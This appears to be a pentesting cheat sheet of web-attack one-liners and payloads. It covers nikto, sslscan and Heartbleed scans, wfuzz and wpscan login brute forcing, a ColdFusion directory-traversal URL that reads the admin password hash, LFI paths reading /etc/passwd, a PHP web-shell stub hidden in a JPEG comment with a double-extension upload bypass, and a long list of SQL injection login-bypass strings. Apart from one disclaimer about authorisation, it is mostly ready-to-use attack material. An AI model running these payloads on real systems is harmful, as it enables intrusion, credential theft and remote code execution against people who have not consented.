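# Web/TLS recon one-liners. Run them only against hosts you are authorised to test.
target=10.10.10.10

# Nikto web-server scan, results written to a file. The option is -output (alias -o)
# with an ASCII dash; the original line carried an en dash, which is a different character.
nikto -h "$target" -output nikto.txt

# Enumerate protocol versions, cipher suites and certificate details on one TLS port.
sslscan 192.168.101.1:443

# Heartbleed (CVE-2014-0160) check via the nmap NSE script. -sV lets the script find TLS
# services; add -p to limit the scan to the in-scope TLS port(s) instead of the default set.
nmap -sV --script=ssl-heartbleed 192.168.3.157

# Fetch the front page with its response headers (-i) to read the server banner and
# cookie/security headers; -sS silences the progress meter but still reports errors.
curl -sSi "http://${target}/"

# Directory/file brute force below /admin/.
dirb "http://10.10.10.1/admin/"

# Login brute force. FUZZ is filled from the first wordlist (users) and FUZ2Z from the
# second (passwords); the original used FUZZ for both fields, which sends the same value
# as username and password. -t 20 is the connection count (the original "-L 20" is not
# valid: -L means follow-redirects and takes no argument). --hw 1224 hides responses whose
# word count matches a failed login; measure that number on the target before reusing it.
login_url="http://${target}/login"
wfuzz -c -t 20 -w users.txt -w pass.txt --hw 1224 \
  -d "username=FUZZ&password=FUZ2Z" "$login_url"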
SQLMap
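# WordPress enumeration with wpscan, written in the 3.x command-line syntax. The older
# 2.x forms used in the original (-u, --username, --wordlist, --random-agent) are not
# accepted by current releases.
wp_url=http://192.168.3.145/

# Enumerate users (u), popular plugins (p) and popular themes (t). Use ap/at to list all
# plugins/themes, or vp/vt to report only components with known vulnerabilities.
wpscan --url "$wp_url" --enumerate u,p,t

# Password guessing for one known username with a wordlist (wpscan uses xmlrpc.php
# where available, otherwise wp-login.php). Expect lockouts/rate limiting on hardened sites.
wpscan --url "$wp_url" --usernames name --passwords pathtolist

# Randomise the User-Agent per request to get past simple UA-based blocking.
wpscan --url http://cybear32c.lab/ --random-user-agent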
Zoom.py (WordPress user-enumeration script)
droopescan (Drupal and other CMS version/plugin scanner): https://github.com/droope/droopescan
/CHANGELOG.txt — often left readable on Drupal (and similar CMS) installs; it discloses the exact installed version.
ColdFusion 8 locale directory traversal (CVE-2010-2861) — reads the admin password hash from password.properties:
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
httpd.conf, Windows config files (e.g. win.ini) — other files worth requesting through the same traversal.
JBoss JMX console (check whether it is reachable without authentication): http://IP:8080/jmx-console/
shell.php%00.gif — null-byte filename trick; only works where the filename is truncated at %00 (very old PHP or C-based filters).
<?php system($_GET['cmd']); ?>   // minimal stub (use <?php — the short <? tag needs short_open_tag), or embed your complete web shell here
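# Embed a PHP command-execution stub in the JPEG's Comment tag. The whole payload sits in
# single quotes, so the PHP array key must use double quotes: the original's nested single
# quotes ended the shell string early and produced $_GET[cmd] instead of $_GET['cmd'].
# exiftool keeps a backup as lo.jpg_original unless -overwrite_original is given.
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' lo.jpg

# Double extension: the file still passes naive "ends with .jpg" checks, but a server that
# maps any .php segment to the PHP handler (e.g. Apache mod_mime with a matching AddHandler)
# will execute the embedded code.
mv lo.jpg lo.php.jpg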
root:pma
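# Fingerprint any WAF/CDN in front of the target before tuning payloads. wafw00f requires
# a URL argument; the bare invocation in the original only prints its usage text.
wafw00f http://10.10.10.10/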
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index   (returns the PHP source base64-encoded instead of executing it; decode locally)
http://example.com/index.php?page=../../../../../../etc/passwd%00   (null-byte truncation of an appended extension; old PHP only)
http://example.com/index.php?page=../../../../../../etc/passwd?    (trailing "?" turns the appended suffix into a query string)
/etc/hosts /etc/resolv.conf
/etc/passwd%00jpg   (null byte followed by the extension the filter expects)
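# SQL injection discovery. The "<target>" placeholder in the original is a shell redirect
# if pasted as-is, so the host lives in a variable instead.
sqli_target=10.10.10.10

# NSE check: spiders the site and injects into the URL parameters it finds. It relies on
# simple error-based heuristics, so treat a clean result as inconclusive, not negative.
nmap -sV --script=http-sql-injection "$sqli_target"

# Replay a captured raw request (e.g. saved from Burp); sqlmap tests the parameters it
# contains (cookies and headers need a higher --level).
sqlmap -r request.txt

# Crawl one link deep from the start URL and test every parameter discovered.
sqlmap -u http://example.com --crawl=1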
Comment terminators: MySQL needs whitespace after "--", hence "-- -" (or use "#"); "--" alone is enough for MSSQL/Oracle/PostgreSQL.
' or 1=1-- -
' or '1'='1
' or '1'='1'-- -
'--
' or '1'='1
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
admin'-- -
admin')-- -
'